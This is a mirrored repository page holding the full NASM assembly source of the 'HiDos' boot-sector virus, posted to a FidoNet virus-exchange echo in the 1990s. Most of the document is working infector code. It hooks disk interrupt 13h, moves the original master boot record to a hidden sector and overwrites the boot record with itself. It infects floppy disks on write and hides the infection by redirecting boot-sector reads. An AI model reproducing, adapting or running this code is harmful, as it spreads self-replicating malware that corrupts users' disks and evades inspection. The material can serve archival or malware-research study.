mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 10:56:10 +00:00
247 lines
6.7 KiB
NASM
247 lines
6.7 KiB
NASM
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
|
||
; Msg : 29 of 54
|
||
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:14
|
||
; To : - *.* - Fri 11 Nov 94 08:10
|
||
; Subj : HIDOS.ASM
|
||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||
;.RealName: Max Ivanov
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;* Kicked-up by MeteO (2:5030/136)
|
||
;* Area : VIRUS (Int: ˆä®p¬ æ¨ï ® ¢¨pãá å)
|
||
;* From : Daniel Hendry, 2:283/718 (06 Nov 94 16:50)
|
||
;* To : Doug Bryce
|
||
;* Subj : HIDOS.ASM
|
||
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
|
||
;@RFC-Path:
|
||
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
|
||
;18.n283!not-for-mail
|
||
;@RFC-Return-Receipt-To: Daniel.Hendry@f718.n283.z2.fidonet.org
|
||
NAME boot
|
||
PAGE 55,132
|
||
TITLE FILE UTIL
|
||
|
||
|
||
|
||
|
||
code segment
|
||
|
||
ASSUME CS:CODE,DS:CODE,ES:CODE
|
||
|
||
org 100h
|
||
|
||
main: jmp over
|
||
db '['
|
||
id db 'HiDos]',0
|
||
by db 'By Apache',0
|
||
over: xor ax,ax
|
||
mov ds,ax
|
||
cli
|
||
mov ss,ax
|
||
mov sp,7c00h
|
||
sti
|
||
mov ax,ds:[004eh]
|
||
mov word ptr ds:[int13+7b02h],ax
|
||
mov ax,ds:[004ch]
|
||
mov word ptr ds:[int13+7b00h],ax
|
||
mov ax,ds:[0413h]
|
||
dec ax
|
||
dec ax
|
||
mov ds:[0413h],ax
|
||
mov cl,06h
|
||
shl ax,cl
|
||
mov es,ax
|
||
mov word ptr ds:[bigj+7b02h],es
|
||
mov ax,offset jumpt
|
||
mov word ptr ds:[bigj+7b00h],ax
|
||
mov cx,0400h
|
||
push cs
|
||
pop ds
|
||
mov si,7c00h
|
||
mov di,0100h
|
||
cld
|
||
repz
|
||
movsb
|
||
push cs
|
||
pop ds
|
||
jmp cs:[bigj+7b00h]
|
||
|
||
jumpt: push cs
|
||
pop ds
|
||
mov si,offset drive
|
||
cmp byte ptr ds:[si],80h
|
||
jz hdone
|
||
mov bx,0300h
|
||
mov cx,0001h
|
||
mov dx,0080h
|
||
push cs
|
||
pop es
|
||
call hdread
|
||
cmp ds:[0304h],'iH'
|
||
jz hdone
|
||
mov bx,0300h
|
||
mov cx,0007h
|
||
mov dx,0080h
|
||
call hdwrit
|
||
mov si,04beh
|
||
mov di,02beh
|
||
mov cx,0042h
|
||
cld
|
||
repz
|
||
movsb
|
||
mov byte ptr ds:[drive],80h
|
||
mov bx,0100h
|
||
mov cx,0001h
|
||
mov dx,0080h
|
||
call hdwrit
|
||
mov byte ptr ds:[drive],00h
|
||
|
||
hdone: xor ax,ax
|
||
mov word ptr cs:[boot+2],ax
|
||
mov es,ax
|
||
push cs
|
||
pop ds
|
||
mov ax,0201h
|
||
mov bx,7c00h
|
||
mov word ptr ds:[boot],bx
|
||
mov si,offset drive
|
||
cmp byte ptr ds:[si],80h
|
||
jz hload
|
||
mov cx,0003h
|
||
mov dx,0100h
|
||
jmp fload
|
||
hload: mov cx,0007h
|
||
mov dx,0080h
|
||
fload: mov di,'rv'
|
||
int 13h
|
||
mov si,offset drive
|
||
mov byte ptr cs:[si],00h
|
||
xor ax,ax
|
||
mov es,ax
|
||
mov ds,ax
|
||
mov ax,offset nint13
|
||
mov ds:[004ch],ax
|
||
mov ds:[004eh],cs
|
||
push cs
|
||
pop ds
|
||
jmp cs:[boot]
|
||
|
||
hdwrit: mov ax,0301h
|
||
mov di,'rv'
|
||
jmp xx4
|
||
hdread: mov ax,0201h
|
||
mov di,'rv'
|
||
xx4: int 13h
|
||
ret
|
||
|
||
nint13: cmp di,'rv'
|
||
jz iv13
|
||
cmp ah,02h
|
||
jnz wcheck
|
||
cmp cl,01h
|
||
jnz wcheck
|
||
cmp dh,00h
|
||
jnz wcheck
|
||
cmp dl,80h
|
||
jz check1
|
||
cmp dl,00h
|
||
jnz wcheck
|
||
check1: push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push ds
|
||
push es
|
||
push di
|
||
mov bx,0300h
|
||
push cs
|
||
pop es
|
||
call hdread
|
||
mov si,offset [id+0200h]
|
||
cmp es:[si],'iH'
|
||
jz redirect
|
||
jmp iflopd
|
||
redirect: cmp dl,80h
|
||
jnz rdirfl
|
||
pop di
|
||
pop es
|
||
pop ds
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
mov cx,0007h
|
||
jmp a13
|
||
|
||
rdirfl: pop di
|
||
pop es
|
||
pop ds
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
mov cx,0003h
|
||
mov dx,0100h
|
||
a13: mov ax,0201h
|
||
iv13: jmp v13
|
||
|
||
|
||
wcheck: cmp ah,03h
|
||
jnz v13
|
||
cmp dl,00h
|
||
jnz v13
|
||
push ax
|
||
push bx
|
||
push cx
|
||
push dx
|
||
push ds
|
||
push es
|
||
push di
|
||
push cs
|
||
pop es
|
||
mov bx,0300h
|
||
mov cx,0001h
|
||
xor dx,dx
|
||
call hdread
|
||
mov si,offset [id+0200h]
|
||
cmp es:[si],'iH'
|
||
jz iflopd
|
||
mov cx,0003h
|
||
mov dx,0100h
|
||
mov bx,0300h
|
||
call hdwrit
|
||
mov bx,0100h
|
||
xor dx,dx
|
||
mov cx,0001h
|
||
call hdwrit
|
||
iflopd: pop di
|
||
pop es
|
||
pop ds
|
||
pop dx
|
||
pop cx
|
||
pop bx
|
||
pop ax
|
||
v13: db 0eah
|
||
int13 dd 0h
|
||
drive db 0h
|
||
bigj dd 0h
|
||
boot dd 0h
|
||
|
||
code ends
|
||
|
||
end main
|
||
|
||
;-+- GEcho 1.10+
|
||
; + Origin: Hans' Point with DOSBoss West, Amsterdam (2:283/718)
|
||
;=============================================================================
|
||
;
|
||
;Yoo-hooo-oo, -!
|
||
;
|
||
;
|
||
; þ The MeÂeO
|
||
;
|
||
;/i Initialize all segments
|
||
;
|
||
;--- Aidstest Null: /Kill
|
||
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)
|
||
|